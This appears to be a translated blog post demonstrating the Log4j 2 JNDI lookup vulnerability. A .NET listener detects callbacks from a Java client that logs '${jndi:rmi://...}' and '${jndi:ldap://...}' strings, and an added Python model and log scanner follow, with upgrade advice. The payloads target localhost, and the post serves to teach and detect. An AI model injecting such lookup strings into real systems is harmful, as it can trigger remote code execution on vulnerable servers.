Since I am comfortable in both .NET and Java, this vulnerability is a good excuse for a demonstration. (Leading with the programming world's favourite saying: don't talk to me, show me the code.)
The .NET code. Bet you didn't expect this: the latest .NET 6 actually uses top-level statements, haha, with all kinds of syntactic sugar on top!
    using System.Net;
    using System.Net.Sockets;
    using System.Threading;

    // .NET 6 top-level statements: a plain TCP listener on port 8100 that reports every
    // incoming connection, so a JNDI lookup issued by the Java client below becomes visible.
    int port = 8100;
    TcpListener tcpListener = new TcpListener(new IPEndPoint(IPAddress.Any, port));
    tcpListener.Start();
    new Thread(() =>
    {
        while (true)
        {
            // Each accepted connection is evidence that the logger reached out to this address.
            TcpClient tcpClient = tcpListener.AcceptTcpClient();
            Console.WriteLine($"connection from {tcpClient.Client.RemoteEndPoint},尼玛,可能存在漏洞!");
            tcpClient.Close();
        }
    })
    { IsBackground = true }.Start();
    Console.WriteLine($"开启监听,端口{port}");
    Console.ReadLine();
    tcpListener.Stop();
The Java code. Don't even think about syntactic sugar and the like here!!!
    import org.apache.logging.log4j.Level;
    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;
    import org.apache.logging.log4j.core.config.Configurator;

    public class Client {
        static Logger log = LogManager.getLogger(Client.class);

        public static void main(String[] args) {
            System.out.println(LogManager.getRootLogger().getLevel().toString());
            // Raise the root logger to INFO so the log.info() calls below are actually written
            Logger logger = LogManager.getRootLogger();
            Configurator.setAllLevels(logger.getName(), Level.INFO);
            System.out.println("hello log");
            // The vulnerable behaviour: Log4j 2.x <= 2.14.1 resolves the ${jndi:...} lookup
            // inside the logged message and connects to the listener on 127.0.0.1:8100
            log.info("${jndi:rmi://127.0.0.1:8100/Main}");
            log.info("${jndi:ldap://127.0.0.1:8100/Main}");
            System.out.println("入侵成功!");
        }
    }
Run results: (screenshot of the .NET listener's console output; screenshot of the Java client's console output)
Summary
Simply put, Log4j2 reaches out over the RMI or LDAP protocol to the address that follows the lookup prefix, resolves whatever that protocol returns, and may end up executing code that was constructed with malicious intent.
Fix: upgrade to a version above 2.14.1
Affected versions: Apache Log4j 2.x <= 2.14.1
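To make the mechanism in the summary concrete, here is an added example that is not part of the original post: a small Python model of Log4j 2's message lookup with the vulnerable behaviour beside the hardened one, plus a scanner that flags ${jndi:...} lookups in log lines. The lookup model, the Trace class and the sample log lines are all constructed for this illustration and are not Log4j's own code.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# One Log4j-style lookup "${prefix:key}" (single level; simplified model, not Log4j's parser)
LOOKUP_RE = re.compile(r"\$\{([A-Za-z]+):([^}]*)\}")

@dataclass
class Trace:
    """Records every JNDI target the simulated lookup would have contacted."""
    jndi_targets: list = field(default_factory=list)

def resolve_lookup(prefix: str, key: str, trace: Trace):
    """Stand-in for Log4j's lookup registry: the real JndiLookup would call
    InitialContext.lookup(key) over RMI/LDAP; here we only record the target."""
    if prefix.lower() == "jndi":
        u = urlsplit(key)
        trace.jndi_targets.append((u.scheme, u.hostname, u.port))
        return "<jndi-result>"
    return None  # unknown prefix: Log4j leaves the text untouched

def format_message(message: str, trace: Trace, lookups_enabled: bool = True) -> str:
    """Vulnerable behaviour (2.x <= 2.14.1): the logged message itself is a template and
    every ${...} in it is resolved. Hardened behaviour: the message is opaque text."""
    if not lookups_enabled:
        return message
    def repl(m):
        result = resolve_lookup(m.group(1), m.group(2), trace)
        return m.group(0) if result is None else result
    return LOOKUP_RE.sub(repl, message)

def scan_log_lines(lines):
    """Detection: flag log lines carrying a ${jndi:...} lookup and parse its target."""
    findings = []
    for n, line in enumerate(lines, 1):
        for m in LOOKUP_RE.finditer(line):
            if m.group(1).lower() == "jndi":
                u = urlsplit(m.group(2))
                findings.append((n, u.scheme, u.hostname, u.port))
    return findings

# Constructed sample log lines: the two payloads from the Client above plus benign noise.
SAMPLE_LINES = [
    "INFO  Client - hello log",
    "INFO  Client - ${jndi:rmi://127.0.0.1:8100/Main}",
    "INFO  Client - ${jndi:ldap://127.0.0.1:8100/Main}",
    "INFO  Client - user=${env:USER} logged in",
]
```

With lookups enabled the two payload lines produce a connection attempt to 127.0.0.1:8100, which is exactly what the .NET listener above reports; with lookups disabled the same text is logged verbatim and nothing is contacted.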